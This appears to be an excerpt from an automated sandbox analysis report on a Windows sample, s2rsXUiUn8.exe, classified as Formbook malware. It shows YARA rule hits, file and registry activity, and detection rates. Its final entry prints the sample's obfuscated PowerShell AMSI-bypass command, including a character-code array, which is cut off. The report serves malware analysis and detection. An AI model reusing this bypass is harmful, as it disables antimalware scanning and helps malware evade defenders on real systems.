          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/6@5/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210722
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: s2rsXUiUn8.exe | Metadefender: Detection: 17%
          Source: s2rsXUiUn8.exe | ReversingLabs: Detection: 57%
          Source: unknown | Process created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,4<